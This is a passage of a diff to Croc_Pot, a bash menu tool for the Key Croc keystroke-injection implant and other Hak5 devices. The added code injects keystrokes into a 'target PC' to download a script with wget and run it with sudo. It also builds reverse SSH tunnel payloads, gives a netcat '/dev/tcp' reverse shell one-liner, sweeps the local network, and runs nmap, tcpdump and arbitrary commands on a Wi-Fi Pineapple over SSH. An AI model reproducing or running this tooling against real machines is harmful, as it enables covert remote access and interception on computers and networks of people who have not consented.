default_ip 172.16.24.1 fi fi 2> /dev/null } ## -#----SSH owl get ip from mac +#----SSH LAN TURTLE get ip from Croc_Pot_Payload ## -owl_check() { - local OWL_IP=$(arp -a | sed -ne '/00:00:00:00:00:00/p' | sed -e 's/.*(\(.*\)).*/\1/') #place Owl mac here -if [[ "${OWL_IP}" =~ ^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$ ]]; then - IP_O=${OWL_IP} +turtle_check() { + local TURTLE_IP=/root/udisk/tools/Croc_Pot/turtle_mac.txt +if [ -e ${TURTLE_IP} ]; then + if [[ "$(sed -n '1p' ${TURTLE_IP})" =~ ${validate_ip} ]]; then + default_ip $(sed -n '1p' ${TURTLE_IP}) else - IP_O=172.16.56.1 -fi -} -## -#----SSH get public ip -## -public_ip() { - echo -ne "${yellow}Public ip:${clear}${green}$(curl -s --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com) ${clear}" + default_ip 172.16.84.1 + fi +fi 2> /dev/null } ## #----SSH check port 22 open or closed ## port_check() { nc -z -v -w 1 ${1} 22 &>/dev/null 2>&1 -if [[ "$?" -ne 0 ]]; then - echo -ne "${yellow} Port:${clear}${red}22 closed${clear}\n" +if [[ $? -ne 0 ]]; then + nc -z -v -w 1 ${DEFAULT_IP} 22 &>/dev/null 2>&1 + if [[ $? -ne 0 ]]; then + echo -ne "${yellow} Port:${clear}${red}22 closed${clear}\n" + unset DEFAULT_IP + elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "${yellow} Port:${clear}${green}22 open${clear}\n" + unset DEFAULT_IP + fi elif [[ "${#args[@]}" -eq 0 ]]; then - echo -ne "${yellow} Port:${clear}${green}22 open${clear}\n" + echo -ne "${yellow} Port:${clear}${green}22 open${clear}\n" fi 2> /dev/null } ## #----SSH get mac addresses ## get_mac () { - echo -ne "${yellow}MAC:${clear}${green}$(arp -n ${1} | awk '/'${1}'/{print $3}' | sed -e 's/HWaddress//g') ${clear}" -} -squirrel_mac() { -if [ -e "/root/udisk/tools/Croc_Pot/squirrel_mac.txt" ]; then - echo -ne "${yellow}MAC:${clear}${green}$(sed -n 1p /root/udisk/tools/Croc_Pot/squirrel_mac.txt) ${clear}" +arp -n ${1} &>/dev/null 2>&1 +if [[ $? -ne 0 ]]; then + if [[ "${save_mac}" =~ ^([[:xdigit:]][[:xdigit:]]:){5}[[:xdigit:]][[:xdigit:]]$ ]]; then + echo -ne "${yellow} MAC:${clear}${green}${save_mac}${clear}" + unset save_mac + else + sleep 0.1 + fi +elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "${yellow} MAC:${clear}${green}$(arp ${1} | awk '{print $3}' | sed -e 's/HWaddress//g' | sed '/^[[:space:]]*$/d')" fi 2> /dev/null } -turtle_mac() { -if [ -e "/root/udisk/tools/Croc_Pot/turtle_mac.txt" ]; then - echo -ne "${yellow}MAC:${clear}${green}$(sed -n 1p /root/udisk/tools/Croc_Pot/turtle_mac.txt) ${clear}" +## +#----SSH check for saved mac address +## +saved_mac() { +if [ -e "${1}" ]; then + save_mac=$(sed -n ${2} ${1}) fi 2> /dev/null } +## +#----SSH check for saved mac address for windows +## +saved_mac_win() { +if [ -e "${1}" ]; then + save_mac=$(cat /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt | grep -iPo \^\.*[[:xdigit:]][[:xdigit:]]:[[:xdigit:]]\.\*\$ | sed -n '/[[:xdigit:]]::/!p' | sed -n '/[[:xdigit:]][[:xdigit:]][[:xdigit:]]:/!p' | cut -d " " -f1 | awk 'FNR <= 1' | sed -e 's/\(.*\)/\L\1/') +fi +} +## +#----SSH check for saved bash bunny mac address +## bunny_mac() { if [ "$(OS_CHECK)" = WINDOWS ]; then sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/bunny_mac.txt - local bunny_v=$(sed -n 1p /root/udisk/tools/Croc_pot/bunny_mac.txt) + local bunny_v=$(sed -n 1p /root/udisk/tools/Croc_Pot/bunny_mac.txt) elif [ "$(OS_CHECK)" = LINUX ]; then - local bunny_v=$(sed -n 1p /root/udisk/tools/Croc_pot/bunny_mac.txt) + local bunny_v=$(sed -n 1p /root/udisk/tools/Croc_Pot/bunny_mac.txt) fi 2> /dev/null -if [[ "$(sed -n 1p /root/udisk/tools/Croc_pot/bunny_mac.txt)" =~ ^([[:xdigit:]][[:xdigit:]]:){5}[[:xdigit:]][[:xdigit:]]$ ]]; then - echo -ne "${yellow}BASH BUNNY:${clear}${green} ONLINE IP: 172.16.64.1${clear}${yellow} MAC:${clear}${green} ${bunny_v}${clear}\n" +if [[ "$(sed -n 1p /root/udisk/tools/Croc_Pot/bunny_mac.txt)" =~ ^([[:xdigit:]][[:xdigit:]]:){5}[[:xdigit:]][[:xdigit:]]$ ]]; then + local bunny_s=$(sed -n 10p /root/udisk/tools/Croc_Pot/Bunny_Payload_Shell/payload.txt | sed -e 's/ssh -fN -R \(.*\):localhost:22/\1/' | sed '1{s/[^ ]\+\s*$//}') + echo -ne "\e[38;5;19;4;1;48;5;245mBASH BUNNY${clear}${yellow}:${clear}${green}TUNNEL${clear} ${yellow}IP:${clear}${green}172.16.64.1${clear}${yellow} MAC:${clear}${green}${bunny_v}${clear}${yellow} Port:${clear}${green}${bunny_s}${clear}\n" else - echo -ne "${yellow}BASH BUNNY:${clear}${red} NOT CONNECTED OR CAN'T BE REACHED${clear}\n" + sleep 0.1 fi 2> /dev/null } ## @@ -4360,19 +6125,60 @@ if [ -e "/root/udisk/tools/Croc_Pot/saved_shell.txt" ]; then remote_vps=$(sed -n 1p /root/udisk/tools/Croc_Pot/saved_shell.txt) fi 2> /dev/null ## +#----SSH check current SSID +## +ssid_check() { + local ss_id=$(iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n '/'$(sed -n -e 's/^WIFI_SSID //p' /root/udisk/config.txt)'/p') + local gateway=$(route -n | grep "UG" | grep -v "UGH" | cut -f 10 -d " ") + local mask=$(/sbin/ifconfig wlan0 | awk '/Mask:/{ print $4;}' | sed 's/Mask:/'\\${yellow}NetMask:\\${clear}\\${green}'/g') + echo -ne "\e[38;5;19;4;1;48;5;245mSSID ${clear}${yellow}:${clear}${green}${ss_id}${clear}${yellow} GATEWAY IP:${clear}${green}${gateway} ${clear}${mask}${clear}\n" +} +## +#----SSH check if screen crab connected to network +## +screen_crab() { + local t_ip=$(route -n | grep "UG" | grep -v "UGH" | cut -f 10 -d " " | sed -r 's/.{1}$//') + for crab in {1..254} ;do (ping -q -c 1 -w 1 $t_ip$crab >/dev/null &) ;done + local crab_host=$(arp -a | sed -n 's/\(android-[0-9]*\+.\+lan\)/\1/p' | awk '{print $1}') + local crab_ip=$(arp -a | sed -n 's/\(android-[0-9]*\+.\+lan\)/\1/p' | awk '{print $2}' | sed 's/[(),]//g') + if [[ "${crab_ip}" =~ ${validate_ip} ]]; then + check_device ${crab_ip} SCREEN CRAB + fi +} +## +#----SSH check signal owl connected to network +## +owl_check() { +#----place Owl mac here + local OWL_MAC=00:00:00:00:00:00 + local OWL_IP=$(arp -a | sed -ne '/'${OWL_MAC}'/p' | sed -e 's/.*(\(.*\)).*/\1/') +if [[ "${OWL_IP}" =~ ${validate_ip} ]]; then + IP_O=${OWL_IP} +else + IP_O=172.16.56.1 +fi +} +## #----SSH display info screen ## - echo -ne "$(Info_Screen '-SSH into HAK5 gear & TARGET PC + echo -ne "$(Info_Screen ' +-SSH into HAK5 gear & TARGET PC -Reverse ssh tunnel, Create SSH Public/Private Key -Ensure devices are connected to the same local network As keycroc')\n" -check_device $(os_ip) TARGET PC: $(public_ip) ; port_check $(os_ip) -check_device 172.16.42.1 WIFI PINEAPPLE: $(get_mac "172.16.42.1") ; port_check 172.16.42.1 -check_device 172.16.32.1 PACKET SQUIRREL: $(squirrel_mac) ; port_check 172.16.32.1 -check_device 172.16.84.1 LAN TURTLE: $(turtle_mac) ; port_check 172.16.84.1 -shark_check ; check_device ${IP_F} SHARK JACK: $(get_mac) ${IP_F} ; port_check ${IP_F} -bunny_mac -check_device ${remote_vps} REMOTE VPS: ; port_check ${remote_vps} -#owl_check ; check_device ${IP_O} OWL : $(get_mac "${IP_O}") ; port_check ${IP_O} +local croc_mac=$(cat /sys/class/net/$(ip route show default | awk '/default/ {print $5}')/address) +local croc_city=$(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=city) +local croc_country=$(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=country) +local croc_region=$(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=region) +local croc_isp=$(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=isp | awk '{print $1}') +check_device $(os_ip) TARGET PC +echo -ne "\e[38;5;19;4;1;48;5;245mPublic ip${clear}${yellow}:${clear}${green}$(curl -s --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com) ${clear}${yellow}COUNTRY:${clear}${green}${croc_country} ${clear}${yellow}CITY:${clear}${green}${croc_city}${clear}${yellow}/${clear}${green}${croc_region} ${clear}${yellow}ISP:${clear}${green}${croc_isp}${clear}\n" +ssid_check ; check_device croc KEY CROC_ | sed 's/--/'$croc_mac'/g' +default_ip 172.16.42.1 ; check_device mk7 WIFI PINEAPPLE7 +saved_mac /root/udisk/tools/Croc_Pot/squirrel_mac.txt 1p ; default_ip 172.16.32.1 ; check_device squirrel PACKET SQUIRREL +sed -i 's/--//g' /root/udisk/tools/Croc_Pot/turtle_mac.txt 2> /dev/null ; saved_mac /root/udisk/tools/Croc_Pot/turtle_mac.txt 2p ; turtle_check ; check_device turtle LAN TURTLE +saved_mac /root/udisk/tools/Croc_Pot/shark_ip.txt 2p ; shark_check ; check_device shark SHARK JACK +#screen_crab ; owl_check ; check_device ${IP_O} SIGNAL OWL_ ; check_device Pineapple.lan WIFI PINEAPPLET +bunny_mac ; check_device ${remote_vps} REMOTE VPS | sed 's/MAC://g' | sed 's/--//g' echo -ne "\e[48;5;202;30m${LINE}${clear}\n" ## #----SSH keycroc to target pc @@ -4406,117 +6212,152 @@ else fi } ## +#----SSH Reachable target on local network +## +reachable_target() { + local t_ip=$(route -n | grep "UG" | grep -v "UGH" | cut -f 10 -d " " | sed -r 's/.{1}$//') + for i in {1..254} ;do (ping -q -c 1 -w 1 $t_ip$i >/dev/null && echo "$t_ip$i" &) ;done + ip n | grep -i reach | sed -r 's/\b(dev|lladdr)\b//g' +} +## #----SSH enter user/ip to start ssh ## userinput_ssh() { - echo -ne "$(ColorBlue 'ENTER THE HOST/USER NAME FOR SSH AND PRESS [ENTER]:')"; read SSH_USER - echo -ne "$(ColorBlue 'ENTER THE IP FOR SSH AND PRESS [ENTER]:')"; read SSH_IP + read_all ENTER THE HOST/USER NAME FOR SSH AND PRESS [ENTER] ; SSH_USER=${r_a} + read_all ENTER THE IP FOR SSH AND PRESS [ENTER] ; SSH_IP=${r_a} ssh -o "StrictHostKeyChecking no" ${SSH_USER}@${SSH_IP} } ## -#----SSH to wifi pineapple +#----SSH wifi pineapple menu/function ## ssh_pineapple() { + echo -ne "$(Info_Screen ' +-Wi-Fi Pineapple Mk7 example/preset command')\n\n" +ping -q -c 1 -w 1 mk7 &>/dev/null 2>&1 +if [[ $? -ne 0 ]]; then + echo -ne "$(ColorRed 'Did not detect Wi-Fi Pineapple Mk7')\n" +elif [[ "${#args[@]}" -eq 0 ]]; then +## +#----SSH Wi-Fi Pineapple Mk7 kismet LED lights random/off/reset/custom +## +pineapple_led() { clear -ssh_shell() { - read_all ENTER WIFI PINEAPPLE IP FOR SSH AND PRESS [ENTER] - ip_check_ssh 172.16.42.1 + echo -ne "$(Info_Screen ' +-Wi-Fi Pineapple Mk7 Kismet LED example command +-Kismet LED Mod command--> LEDMK7 --help +-Reset color command--> LEDMK7 -r +-Trun LED off command--> LEDMK7 -0 0,0,0 -1 0,0,0 -2 0,0,0 -3 0,0,0 +-Each LED is set to a Hue color 0-360, Saturation 0-255, and brightness 0-255 +-More info at https://www.kismetwireless.net/mk7-led-mod')\n\n" +## +#----SSH Wi-Fi Pineapple Mk7 kismet led random light +## +kismet_ramdom() { + read_all RANDOM MK7 KISMET LED LIGHT Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + Countdown 1 15 & +for i in {1..10}; do ssh root@mk7 LEDMK7 -a $(( $RANDOM % 360 )),$(( $RANDOM % 255 )) -b $(( $RANDOM % 360 )),$(( $RANDOM % 255 )); sleep 5; ssh root@mk7 LEDMK7 -r; sleep 1; done + ssh root@mk7 LEDMK7 -r + Countdown 1 15 & +for i in {1..10}; do ssh root@mk7 LEDMK7 -p $(( $RANDOM % 360 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )); sleep 5; ssh root@mk7 LEDMK7 -r; sleep 1; done + ssh root@mk7 LEDMK7 -r + Countdown 1 15 & +for i in {1..10}; do ssh root@mk7 LEDMK7 -0 $(( $RANDOM % 360 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )) -1 $(( $RANDOM % 255 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )) -2 $(( $RANDOM % 255 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )) -3 $(( $RANDOM % 255 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )); sleep 5; ssh root@mk7 LEDMK7 -r; sleep 1; done ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; pineapple_led ;; +esac } ## -#----SSH start wifi pineapple web UI +#----SSH Wi-Fi Pineapple Mk7 kismet LED lights custom ## -pine_web() { - echo -ne "\n$(ColorYellow 'Starting WIFI Pineapple web page')\n" -if [ "$(OS_CHECK)" = WINDOWS ]; then - Q GUI d - Q GUI r - sleep 1 - Q STRING "powershell" - Q ENTER - sleep 2 - Q STRING "Start-Process http://172.16.42.1:1471; exit" - Q ENTER -else - case $HOST_CHECK in -raspberrypi) - Q GUI d - sleep 1 - Q STRING "LXTerminal" - Q ENTER - Q ENTER - sleep 1 - Q STRING "gio open http://172.16.42.1:1471; exit" - Q ENTER ;; -parrot) - Q ALT F2 - sleep 1 - Q STRING "mate-terminal" - Q ENTER - sleep 1 - Q STRING "gio open http://172.16.42.1:1471; exit" - Q ENTER ;; -*) - Q ALT F2 - sleep 1 - Q STRING "xterm" - Q ENTER - sleep 1 - Q STRING "gio open http://172.16.42.1:1471; exit" - Q ENTER ;; +kismet_custom() { + read_all ENTER FIRST COLOR CODE AND PRESS [ENTER] ; local first_color=${r_a} + read_all ENTER FIRST BRIGHTNESS CODE AND PRESS [ENTER] ; local first_bright=${r_a} + read_all ENTER SECOND COLOR CODE AND PRESS [ENTER] ; local second_color=${r_a} + read_all ENTER SECOND BRIGHTNESS CODE AND PRESS [ENTER] ; local first_bright=${r_a} + ssh root@mk7 LEDMK7 -a ${first_color},${first_bright} -b ${second_color},${first_bright} +} +## +#----SSH wifi pineapple kismet led mod menu +## +MenuTitle MK7 KISMET LED MOD MENU ; MenuColor 19 1 RANDOM LED ; MenuColor 19 2 RESTORE LED ; MenuColor 19 3 TRUN OFF LED ; MenuColor 19 4 CUSTOM LED +MenuColor 19 5 RETURN TO MAIN MENU ; MenuEnd 22 + case $m_a in + 1) kismet_ramdom ; pineapple_led ;; 2) ssh root@mk7 LEDMK7 -r ; pineapple_led ;; 3) ssh root@mk7 LEDMK7 -0 0,0,0 -1 0,0,0 -2 0,0,0 -3 0,0,0 ; pineapple_led ;; + 4) kismet_custom ; pineapple_led ;; 5) main_menu ;; 0) exit 0 ;; [bB]) ssh_pineapple ;; + *) invalid_entry ; ssh root@mk7 LEDMK7 -0 0,0,0 -1 0,0,0 -2 0,0,0 -3 0,0,0 ; pineapple_led ;; esac -fi } ## #----SSH wifi pineapple menu ## -MenuTitle WIFI PINEAPPLE MENU -MenuColor 1 SSH PINEAPPLE ; echo -ne " ${clear}\n" -MenuColor 2 PINEAPPLE WEB ; echo -ne " ${clear}\n" -MenuColor 3 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle WIFI PINEAPPLE MENU ; MenuColor 19 1 SSH PINEAPPLE ; MenuColor 19 2 PINEAPPLE WEB ; MenuColor 19 3 MK7 LED MOD MENU ; MenuColor 19 4 MK7 STATUS/INFO +MenuColor 19 5 MK7 TCPDUMP ; MenuColor 19 6 ENTER COMMAND ; MenuColor 19 7 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) ssh_shell ; ssh_menu ;; - 2) pine_web ; ssh_menu ;; - 3) main_menu ;; + 1) ip_check_ssh mk7 172.16.42.1 ; ssh_menu ;; + 2) start_web http://172.16.42.1:1471 ; ssh_menu ;; + 3) pineapple_led ;; + 4) ssh root@mk7 'uname -a ; uptime' ; echo ${LINE} ; ssh root@mk7 ifconfig ; echo ${LINE} ; ssh root@mk7 netstat -tunlp ; echo ${LINE} ; ssh root@mk7 ps -aux ; echo ${LINE} + ssh root@mk7 iw dev wlan1 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort ; sleep 2 ; echo ${LINE} + ssh root@mk7 nmap -Pn -sS -T 3 172.16.42.1/24 ; echo ${LINE} ; ssh_pineapple ;; + 5) ssh root@mk7 tcpdump -XX -i any ; ssh_pineapple ;; + 6) read_all ENTER COMMAND AND PRESS [ENTER] ; local USER_COMMAND=${r_a} + ssh root@mk7 ''${USER_COMMAND}'' ; sleep 5 ; ssh_pineapple ;; + 7) main_menu ;; 0) exit 0 ;; [bB]) ssh_menu ;; - *) invalid_entry ; ssh_menu ;; + *) invalid_entry ; ssh_pineapple ;; esac +fi } ## #----SSH to packet squirrel ## ssh_squirrel() { - read_all ENTER PACKET SQUIRREL IP FOR SSH AND PRESS [ENTER] - ip_check_ssh 172.16.32.1 + ip_check_ssh squirrel 172.16.32.1 } ## #----SSH to lan turtle ## ssh_turtle() { - read_all ENTER LAN TURTLE IP FOR SSH AND PRESS [ENTER] - ip_check_ssh 172.16.84.1 + local TURTLE_IP=/root/udisk/tools/Croc_Pot/turtle_mac.txt +if [ -e ${TURTLE_IP} ]; then + if [[ "$(sed -n '1p' ${TURTLE_IP})" =~ ${validate_ip} ]]; then + ip_check_ssh $(sed -n '1p' ${TURTLE_IP}) turtle +else + ip_check_ssh turtle 172.16.84.1 + fi +fi 2> /dev/null } ## #----SSH to signal owl ## ssh_owl() { - read_all ENTER SIGNAL OWL IP FOR SSH AND PRESS [ENTER] - ip_check_ssh ${IP_O} + ip_check_ssh ${IP_O} 172.16.56.1 } ## #----SSH to shark jack ## ssh_shark() { - read_all ENTER SHARK JACK IP FOR SSH AND PRESS [ENTER] - ip_check_ssh ${IP_F} + local SHARK_IP=/root/udisk/tools/Croc_Pot/shark_ip.txt +if [ -e ${SHARK_IP} ]; then + if [[ "$(sed -n '1p' ${SHARK_IP})" =~ ${validate_ip} ]]; then + ip_check_ssh $(sed -n '1p' ${SHARK_IP}) shark +else + ip_check_ssh shark 172.16.24.1 + fi +fi 2> /dev/null } ## #----SSH to bash bunny ## ssh_bunny() { clear - echo -ne "$(Info_Screen '-Start ssh with Target PC to Bash bunny or + echo -ne "$(Info_Screen ' +-Start ssh with Target PC to Bash bunny or -Start REVERSE SHELL Tunnel with keycroc to bash bunny -Will need a small payload install on bash bunny -This will create the payload for the bash bunny and save it to tools folder @@ -4528,6 +6369,109 @@ reverse shell tunnel From bunny to keycroc local bunny_payload=/root/udisk/tools/Croc_Pot/Bunny_Payload_Shell local bunny_payload_v=/root/udisk/tools/Croc_Pot/Bunny_Payload_Shell/payload.txt ## +#----Connect bunny to target pc network linux only +## +if [ "$(OS_CHECK)" = LINUX ]; then + read_all CONNECT BUNNY TO TARGET PC NETWORK Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + case $HOST_CHECK in + raspberrypi) + Q GUI d + sleep 1 + Q STRING "LXTerminal" + Q ENTER + Q ENTER + sleep 1 + Q STRING "i=\$(whoami)" + Q ENTER + Q STRING "if [ -e /home/\${i}/bb.sh ]; then" + Q ENTER + Q STRING "echo \"bb.sh is installed\"" + Q ENTER + Q STRING "else" + Q ENTER + Q STRING "echo \"installing bb.sh\"" + Q ENTER + Q STRING "wget bashbunny.com/bb.sh" + Q ENTER + Q STRING "fi" + Q ENTER + sleep 2 + Q STRING "sudo bash ./bb.sh" + Q ENTER + sleep 3 + Q STRING "c" + sleep 2 + Q STRING "exit" + Q ENTER + Q ALT-TAB ;; + parrot) + Q ALT F2 + sleep 1 + Q STRING "mate-terminal" + Q ENTER + sleep 1 + Q STRING "i=\$(whoami)" + Q ENTER + Q STRING "if [ -e /home/\${i}/bb.sh ]; then" + Q ENTER + Q STRING "echo \"bb.sh is installed\"" + Q ENTER + Q STRING "else" + Q ENTER + Q STRING "echo \"installing bb.sh\"" + Q ENTER + Q STRING "wget bashbunny.com/bb.sh" + Q ENTER + Q STRING "fi" + Q ENTER + sleep 2 + Q STRING "sudo bash ./bb.sh" + Q ENTER + sleep 3 + Q STRING "c" + sleep 2 + Q STRING "exit" + Q ENTER + Q ALT-TAB ;; + *) + Q ALT F2 + sleep 1 + Q STRING "xterm" + Q ENTER + sleep 1 + Q STRING "i=\$(whoami)" + Q ENTER + Q STRING "if [ -e /home/\${i}/bb.sh ]; then" + Q ENTER + Q STRING "echo \"bb.sh is installed\"" + Q ENTER + Q STRING "else" + Q ENTER + Q STRING "echo \"installing bb.sh\"" + Q ENTER + Q STRING "wget bashbunny.com/bb.sh" + Q ENTER + Q STRING "fi" + Q ENTER + sleep 2 + Q STRING "sudo bash ./bb.sh" + Q ENTER + sleep 3 + Q STRING "c" + sleep 2 + Q STRING "exit" + Q ENTER + Q ALT-TAB ;; + esac ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; ssh_bunny ;; + esac +fi +## #----bunny create reverse shell payload for keycroc ## if [ -d "${bunny_payload}" ]; then @@ -4601,14 +6545,15 @@ esac fi ;; [nN] | [nN][oO]) echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; -*) invalid_entry ; ssh_bunny ;; +*) + invalid_entry ; ssh_bunny ;; esac ## #----bunny start reverse shell bunny to keycroc ## read_all START REVERSE TUNNEL WITH BUNNY TO CROC Y/N AND PRESS [ENTER] case $r_a in - [yY] | [yY][eE][sS]) +[yY] | [yY][eE][sS]) if [ "$(OS_CHECK)" = WINDOWS ]; then LED ATTACK ssh -o "StrictHostKeyChecking no" root@localhost -p 7000 @@ -4616,10 +6561,10 @@ elif [ "$(OS_CHECK)" = LINUX ]; then LED ATTACK ssh -o "StrictHostKeyChecking no" root@localhost -p 7000 fi ;; - [nN] | [nN][oO]) - echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; - *) - invalid_entry ; ssh_bunny ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; ssh_bunny ;; esac } ## @@ -4627,7 +6572,8 @@ esac ## ssh_keygen() { clear - echo -ne "$(Info_Screen '-Create public/private keys using ssh-key-gen on local-host + echo -ne "$(Info_Screen ' +-Create public/private keys using ssh-key-gen on local-host -Generate keys on the keycroc and send to remote-host -This will run ssh-keygen and copy to remote-host -ssh-copy-id -i ~/.ssh/id_rsa.pub username@remote-host-ip @@ -4657,31 +6603,34 @@ esac ## croc_reverse_shell() { clear - echo -ne "$(Info_Screen '# 1 Start reverse shell with nc start listening on remote-server first + echo -ne "$(Info_Screen ' +# 1 Start reverse shell with nc start listening on remote-server first # 2 Start listening on the keycroc # 3 Create payload to start reverse shell KeyCroc to remote-server # 4 Start reverse ssh tunnel target pc to KeyCroc # 5 Start reverse ssh tunnel Keycroc to remote-server -# 6 Send remote commands with ssh')\n\n" +# 6 Send remote commands with ssh +# 7 Send remote files with SCP')\n\n" shell_input() { unset IP_RS IP_RSP IP_RSN rm /root/udisk/tools/Croc_Pot/saved_shell.txt 2> /dev/null - echo -ne "$(ColorBlue 'ENTER IP OF SERVER/REMOTE-HOST PRESS [ENTER]:')"; read IP_RS ; echo "${IP_RS}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt - echo -ne "$(ColorBlue 'ENTER PORT NUMBER TO USE PRESS [ENTER]:')"; read IP_RSP ; echo "${IP_RSP}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt - echo -ne "$(ColorBlue 'ENTER SERVER/REMOTE-HOST NAME PRESS [ENTER]:')"; read IP_RSN ; echo "${IP_RSN}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt + read_all ENTER IP OF SERVER/REMOTE-HOST PRESS [ENTER] ; IP_RS=${r_a} ; echo "${IP_RS}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt + read_all ENTER PORT NUMBER TO USE PRESS [ENTER] ; IP_RSP=${r_a} ; echo "${IP_RSP}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt + read_all ENTER SERVER/REMOTE-HOST NAME PRESS [ENTER] ; IP_RSN=${r_a} ; echo "${IP_RSN}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt } ## #----SSH reverse with netcat remote listener on (server) ## remote_listener() { clear - echo -ne "$(Info_Screen '-Start a reverse shell with netcat on keycroc + echo -ne "$(Info_Screen ' +-Start a reverse shell with netcat on keycroc -Remotely access keycroc from a remote-server -Frist On the listening remote-server enter this below --\e[40;32mnc -lnvp PORT# -s IP OF LISTENING REMOTE-SERVER\e[0m\e[40;93m +-->nc -lnvp PORT# -s IP OF LISTENING REMOTE-SERVER -On Keycroc Enter ip of the listening remote-server and port number -Keycroc side will be setup as below --\e[40;32m/bin/bash -i >& /dev/tcp/remote-server-ip/port#')${clear}\n\n" +-->/bin/bash -i >& /dev/tcp/remote-server-ip/port#')\n" read_all START REVERSE SHELL Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) @@ -4713,11 +6662,12 @@ fi ;; esac } ## -#----SSH croc as listener +#----SSH keycroc as listener ## croc_listener() { clear - echo -ne "$(Info_Screen '-Start Listening on keycroc + echo -ne "$(Info_Screen ' +-Start Listening on keycroc -Access on remote PC,server -This will start listening on the keycroc -Enter this below on remote-server/host side @@ -4735,16 +6685,17 @@ case $r_a in esac } ## -#----SSH reverse ssh tunnel croc (payload) +#----SSH reverse ssh tunnel keycroc (payload) ## reverse_payload() { clear - echo -ne "$(Info_Screen '-Create Reverse SSH Tunnel Payload keycroc to remote-server + echo -ne "$(Info_Screen ' +-Create Reverse SSH Tunnel Payload keycroc to remote-server -Plug keycroc into Target pc and type in croctunnel -Keycroc side will be setup as below --\e[40;32mssh -fN -R port#:localhost:22 username@your-server-ip\e[0m\e[40;93m +-->ssh -fN -R port#:localhost:22 username@your-server-ip -Enter on remote-server side as below --\e[40;32mssh root@localhost -p port#')${clear}\n\n" +-->ssh root@localhost -p port#')\n" local PAYLOAD_SHELL=/root/udisk/payloads/Croc_Shell.txt if [ -e "${PAYLOAD_SHELL}" ]; then echo -ne "\n$(ColorGreen 'Croc_Shell already exists')\n" @@ -4779,11 +6730,12 @@ fi ## shell_pc() { clear - echo -ne "$(Info_Screen '-Start reverse ssh tunnel Target PC to Keycroc + echo -ne "$(Info_Screen ' +-Start reverse ssh tunnel Target PC to Keycroc -PC side will be setup with this below --\e[40;32mssh -fN -R port#:localhost:22 